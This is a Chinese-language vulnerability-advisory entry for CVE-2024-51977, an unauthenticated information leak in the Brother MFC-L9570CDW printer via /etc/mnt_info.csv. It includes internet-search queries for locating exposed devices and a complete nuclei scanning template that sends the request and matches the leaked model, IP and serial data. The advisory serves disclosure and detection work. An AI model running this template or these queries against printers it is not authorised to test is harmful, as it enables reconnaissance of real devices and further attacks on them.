Brother MFC-L9570CDW 信息泄露漏洞

漏洞信息

漏洞名称: Brother MFC-L9570CDW 信息泄露漏洞

漏洞编号:

  • CVE: CVE-2024-51977

漏洞类型: 信息泄露

漏洞等级: 中危

漏洞描述: Brother MFC-L9570CDW是一款多功能打印机,广泛应用于企业和家庭环境中,提供打印、扫描、复印等功能。该设备支持通过HTTP服务(TCP端口80)、HTTPS服务(TCP端口443)或IPP服务(TCP端口631)进行网络访问。

该漏洞属于信息泄露类型,技术根源在于设备未对访问/etc/mnt_info.csv路径的请求进行适当的身份验证。攻击者可以通过发送GET请求到该路径,无需任何认证即可获取设备的敏感信息,包括设备型号、固件版本、IP地址和序列号等。这些信息以逗号分隔值(CSV)表格的形式返回。

此漏洞的安全风险在于,攻击者可以利用泄露的信息进行进一步的攻击,如针对特定型号和固件版本的漏洞利用,或者进行网络钓鱼等社会工程学攻击。由于漏洞无需认证即可利用,且可以通过自动化工具批量扫描和利用,因此对受影响设备构成了中等程度的安全威胁。

产品厂商: Brother

产品名称: Brother MFC-L9570CDW

搜索语法: html:”MFC-L9570CDW”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/248975b0dd50823c64c0718b4d250bc85788707a/http%2Fcves%2F2024%2FCVE-2024-51977.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

id: CVE-2024-51977

info:
  name: Brother MFC-L9570CDW - Information Disclosure
  author: DhiyaneshDK,iamnoooob,darses
  severity: medium
  description: |
    An unauthenticated attacker who can access either the HTTP service (TCP port 80), the HTTPS service (TCP port 443), or the IPP service (TCP port 631), can leak several pieces of sensitive information from a vulnerable device. The URI path /etc/mnt_info.csv can be accessed via a GET request and no authentication is required. The returned result is a comma separated value (CSV) table of information. The leaked information includes the device’s model, firmware version, IP address, and serial number.
  reference:
    - https://github.com/sfewer-r7/BrotherVulnerabilities/blob/main/CVE-2024-51977.rb
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"MFC-L9570CDW"
    fofa-query:
      - app="brother-Printer"
    zoomeye-query:
      - device="brother-Printer" || app="brother-Printer"
  tags: cve,cve2024,brother,mfc,printer,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/etc/mnt_info.csv"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Model Name"'
          - '"IP Address"'
        condition: and

      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(content_type, "text/comma-separated-values")'